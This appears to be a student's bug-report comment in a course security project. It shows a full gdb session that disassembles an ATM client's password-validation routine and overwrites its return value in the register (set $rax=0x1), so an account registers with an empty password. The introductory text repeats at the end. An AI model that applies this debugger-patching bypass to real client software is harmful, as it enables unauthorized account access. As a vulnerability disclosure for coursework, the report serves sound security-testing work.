Here, as you can see below I used nothing like empty password but still I was able to register with empty password which means your password validation is vulnerable to bit exploitation attack
Below as you can see I registered successfully as tryingtoregister username and empty password field and 10.00 as initial account balance and the process I followed can be recreated using following example.
Let me know, if you have any queries with recreating the same !
ruchitjagodara@ruchitjagodara:~/Education/CNS/project-cns/project-submissions/group-1/build$ gdb atm
GNU gdb (Ubuntu 15.0.50.20240403-0ubuntu1) 15.0.50.20240403-git
Copyright (C) 2024 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from atm...
(gdb) break validate_password
Breakpoint 1 at 0x79f9: file atm_final.cpp, line 200.
(gdb) run
Starting program: /home/ruchitjagodara/Education/CNS/project-cns/project-submissions/group-1/build/requirements/atm
This GDB supports auto-downloading debuginfo from the following URLs:
<https://debuginfod.ubuntu.com>
Enable debuginfod for this session? (y or [n]) y
Debuginfod has been enabled.
To make this setting permanent, add 'set debuginfod enabled on' to .gdbinit.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Server: VERIFIED
ATM Menu:
1. Register
2. Login
3. Exit
Enter your choice: 1
Enter username (allowed: [_-., digits, lowercase letters], 1-122 chars): tryingtoregister
Enter password (min 8 chars, must include uppercase, lowercase, number, special char, no spaces):
Breakpoint 1, validate_password (password="") at atm_final.cpp:200
200 {
(gdb) disassemble validate_password
Dump of assembler code for function _Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE:
0x000055555555b9e9 <+0>: endbr64
0x000055555555b9ed <+4>: push %rbp
0x000055555555b9ee <+5>: mov %rsp,%rbp
0x000055555555b9f1 <+8>: sub $0x40,%rsp
0x000055555555b9f5 <+12>: mov %rdi,-0x38(%rbp)
=> 0x000055555555b9f9 <+16>: mov %fs:0x28,%rax
0x000055555555ba02 <+25>: mov %rax,-0x8(%rbp)
0x000055555555ba06 <+29>: xor %eax,%eax
0x000055555555ba08 <+31>: mov -0x38(%rbp),%rax
0x000055555555ba0c <+35>: mov %rax,%rdi
0x000055555555ba0f <+38>: call 0x55555555acb0 <_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE6lengthEv@plt>
0x000055555555ba14 <+43>: cmp $0x7,%rax
0x000055555555ba18 <+47>: setbe %al
0x000055555555ba1b <+50>: test %al,%al
0x000055555555ba1d <+52>: je 0x55555555ba29 <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+64>
0x000055555555ba1f <+54>: mov $0x0,%eax
0x000055555555ba24 <+59>: jmp 0x55555555bb12 <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+297>
0x000055555555ba29 <+64>: movb $0x0,-0x25(%rbp)
0x000055555555ba2d <+68>: movb $0x0,-0x24(%rbp)
0x000055555555ba31 <+72>: movb $0x0,-0x23(%rbp)
0x000055555555ba35 <+76>: movb $0x0,-0x22(%rbp)
0x000055555555ba39 <+80>: mov -0x38(%rbp),%rax
0x000055555555ba3d <+84>: mov %rax,-0x10(%rbp)
0x000055555555ba41 <+88>: mov -0x10(%rbp),%rax
0x000055555555ba45 <+92>: mov %rax,%rdi
0x000055555555ba48 <+95>: call 0x55555555a9c0 <_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE5beginEv@plt>
0x000055555555ba4d <+100>: mov %rax,-0x20(%rbp)
0x000055555555ba51 <+104>: mov -0x10(%rbp),%rax
0x000055555555ba55 <+108>: mov %rax,%rdi
0x000055555555ba58 <+111>: call 0x55555555b000 <_ZNKSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEE3endEv@plt>
0x000055555555ba5d <+116>: mov %rax,-0x18(%rbp)
0x000055555555ba61 <+120>: jmp 0x55555555bad2 <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+233>
0x000055555555ba63 <+122>: lea -0x20(%rbp),%rax
0x000055555555ba67 <+126>: mov %rax,%rdi
0x000055555555ba6a <+129>: call 0x55555555f7ea <_ZNK9__gnu_cxx17__normal_iteratorIPKcNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEEdeEv>
0x000055555555ba6f <+134>: movzbl (%rax),%eax
0x000055555555ba72 <+137>: mov %al,-0x21(%rbp)
0x000055555555ba75 <+140>: movsbl -0x21(%rbp),%eax
0x000055555555ba79 <+144>: mov %eax,%edi
--Type <RET> for more, q to quit, c to continue without paging--
0x000055555555ba7b <+146>: call 0x55555555aee0 <isupper@plt>
0x000055555555ba80 <+151>: test %eax,%eax
0x000055555555ba82 <+153>: je 0x55555555ba88 <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+159>
0x000055555555ba84 <+155>: movb $0x1,-0x25(%rbp)
0x000055555555ba88 <+159>: movsbl -0x21(%rbp),%eax
0x000055555555ba8c <+163>: mov %eax,%edi
0x000055555555ba8e <+165>: call 0x55555555adc0 <islower@plt>
0x000055555555ba93 <+170>: test %eax,%eax
0x000055555555ba95 <+172>: je 0x55555555ba9b <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+178>
0x000055555555ba97 <+174>: movb $0x1,-0x24(%rbp)
0x000055555555ba9b <+178>: movsbl -0x21(%rbp),%eax
0x000055555555ba9f <+182>: sub $0x30,%eax
0x000055555555baa2 <+185>: cmp $0x9,%eax
0x000055555555baa5 <+188>: setbe %al
0x000055555555baa8 <+191>: movzbl %al,%eax
0x000055555555baab <+194>: test %eax,%eax
0x000055555555baad <+196>: je 0x55555555bab3 <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+202>
0x000055555555baaf <+198>: movb $0x1,-0x23(%rbp)
0x000055555555bab3 <+202>: movsbl -0x21(%rbp),%eax
0x000055555555bab7 <+206>: mov %eax,%edi
0x000055555555bab9 <+208>: call 0x55555555ab80 <isalnum@plt>
0x000055555555babe <+213>: test %eax,%eax
0x000055555555bac0 <+215>: jne 0x55555555bac6 <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+221>
0x000055555555bac2 <+217>: movb $0x1,-0x22(%rbp)
0x000055555555bac6 <+221>: lea -0x20(%rbp),%rax
0x000055555555baca <+225>: mov %rax,%rdi
0x000055555555bacd <+228>: call 0x55555555f7c6 <_ZN9__gnu_cxx17__normal_iteratorIPKcNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEEppEv>
0x000055555555bad2 <+233>: lea -0x18(%rbp),%rdx
0x000055555555bad6 <+237>: lea -0x20(%rbp),%rax
0x000055555555bada <+241>: mov %rdx,%rsi
0x000055555555badd <+244>: mov %rax,%rdi
0x000055555555bae0 <+247>: call 0x55555555f787 <_ZN9__gnu_cxxneIPKcNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEEEEbRKNS_17__normal_iteratorIT_T0_EESE_>
0x000055555555bae5 <+252>: test %al,%al
0x000055555555bae7 <+254>: jne 0x55555555ba63 <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+122>
0x000055555555baed <+260>: cmpb $0x0,-0x25(%rbp)
0x000055555555baf1 <+264>: je 0x55555555bb0c <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+291>
0x000055555555baf3 <+266>: cmpb $0x0,-0x24(%rbp)
0x000055555555baf7 <+270>: je 0x55555555bb0c <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+291>
0x000055555555baf9 <+272>: cmpb $0x0,-0x23(%rbp)
--Type <RET> for more, q to quit, c to continue without paging--
0x000055555555bafd <+276>: je 0x55555555bb0c <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+291>
0x000055555555baff <+278>: cmpb $0x0,-0x22(%rbp)
0x000055555555bb03 <+282>: je 0x55555555bb0c <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+291>
0x000055555555bb05 <+284>: mov $0x1,%eax
0x000055555555bb0a <+289>: jmp 0x55555555bb11 <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+296>
0x000055555555bb0c <+291>: mov $0x0,%eax
0x000055555555bb11 <+296>: nop
0x000055555555bb12 <+297>: mov -0x8(%rbp),%rdx
0x000055555555bb16 <+301>: sub %fs:0x28,%rdx
0x000055555555bb1f <+310>: je 0x55555555bb26 <_Z17validate_passwordRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+317>
0x000055555555bb21 <+312>: call 0x55555555aa50 <__stack_chk_fail@plt>
0x000055555555bb26 <+317>: leave
0x000055555555bb27 <+318>: ret
End of assembler dump.
(gdb) break *0x000055555555bb27
Breakpoint 2 at 0x55555555bb27: file atm_final.cpp, line 216.
(gdb) continue
Continuing.
Breakpoint 2, 0x000055555555bb27 in validate_password (password="") at atm_final.cpp:216
216 }
(gdb) i r
rax 0x0 0
rbx 0x20 32
rcx 0x7ffff711ba61 140737338522209
rdx 0x0 0
rsi 0x20 32
rdi 0x7fffffffc0a0 140737488339104
rbp 0x7fffffffda80 0x7fffffffda80
rsp 0x7fffffffbf68 0x7fffffffbf68
r8 0x5555555a6010 93824992567312
r9 0x7 7
r10 0x555555637890 93824993163408
r11 0x246 582
r12 0x1 1
r13 0x0 0
r14 0x5555555a45d8 93824992560600
r15 0x7ffff7ffd000 140737354125312
rip 0x55555555bb27 0x55555555bb27 <validate_password(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)+318>
eflags 0x246 [ PF ZF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
fs_base 0x7ffff7ddcb80 140737351895936
gs_base 0x0 0
(gdb) set $rax=0x1
(gdb) continue
Continuing.
Enter initial deposit amount (must be formatted as 0.00): 10.00
Server: Registration successful!
ATM Menu:
1. Register
2. Login
3. Exit
Enter your choice:
bichhawat
commented
1 week ago
Here, as you can see below I used nothing like empty password but still I was able to register with empty password which means your password validation is vulnerable to bit exploitation attack
Below as you can see I registered successfully as tryingtoregister username and empty password field and 10.00 as initial account balance and the process I followed can be recreated using following example.
Let me know, if you have any queries with recreating the same !